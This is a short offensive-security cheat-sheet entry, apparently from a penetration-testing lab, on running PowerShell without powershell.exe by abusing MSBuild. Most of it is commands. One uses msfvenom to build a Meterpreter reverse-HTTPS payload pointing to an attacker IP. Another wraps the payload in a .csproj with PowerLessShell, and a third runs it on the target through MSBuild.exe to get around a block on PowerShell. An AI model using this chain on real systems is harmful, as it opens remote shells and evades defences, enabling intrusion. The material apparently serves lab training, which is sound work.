Powershell Without Powershell.exe


Powershell.exe is just a process hosting the System.Management.Automation.dll which essentially is the actual Powershell as we know it. If you run into a situation where powershell.exe is blocked and no strict application whitelisting is implemented, there are ways to execute powershell still.


PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the PowerShell process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code.

#Generate a malisious powershell script
v4resk@kali$ msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1

#Generate a .csproj with PowerLessShell
v4resk@kali$ python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj

#Execute it on the target with MSBuild.exe
C:\Users\thm> c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj


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